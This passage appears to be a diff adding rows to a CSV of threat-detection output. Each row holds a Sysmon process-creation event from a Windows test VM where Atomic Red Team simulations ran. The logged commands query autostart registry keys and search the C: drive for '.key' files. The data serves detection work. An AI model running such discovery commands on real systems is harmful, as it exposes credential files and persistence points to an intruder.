+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.660402Z"">
+    </TimeCreated>
+    <EventRecordID>3693</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.629</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00103F573100</Data>
+    <Data Name=""ProcessId"">2440</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.551678Z"">
+    </TimeCreated>
+    <EventRecordID>3691</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.541</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010B4523100</Data>
+    <Data Name=""ProcessId"">4016</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.463556Z"">
+    </TimeCreated>
+    <EventRecordID>3689</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.447</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010264E3100</Data>
+    <Data Name=""ProcessId"">1428</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.389557Z"">
+    </TimeCreated>
+    <EventRecordID>3687</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.377</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001097493100</Data>
+    <Data Name=""ProcessId"">1680</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.304938Z"">
+    </TimeCreated>
+    <EventRecordID>3685</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.284</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001009453100</Data>
+    <Data Name=""ProcessId"">5016</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.227372Z"">
+    </TimeCreated>
+    <EventRecordID>3683</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.212</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00107A403100</Data>
+    <Data Name=""ProcessId"">5984</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.150327Z"">
+    </TimeCreated>
+    <EventRecordID>3681</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.135</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010E83B3100</Data>
+    <Data Name=""ProcessId"">2888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:31.690830Z"">
+    </TimeCreated>
+    <EventRecordID>3680</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:31.675</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87B-5D31-0000-0010D92D3100</Data>
+    <Data Name=""ProcessId"">3188</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe  /S /D /c&quot; dir c:\ /b /s .key &quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:57.557947Z"">
+    </TimeCreated>
+    <EventRecordID>3678</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:57.532</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-001045922F00</Data>
+    <Data Name=""ProcessId"">6220</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe  /S /D /c&quot; dir c:\ /b /s .key &quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D859-5D31-0000-0010FB8F2F00</Data>
+    <Data Name=""ParentProcessId"">888</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:57.524876Z"">
+    </TimeCreated>
+    <EventRecordID>3677</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:57.502</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-0010FB8F2F00</Data>
+    <Data Name=""ProcessId"">888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
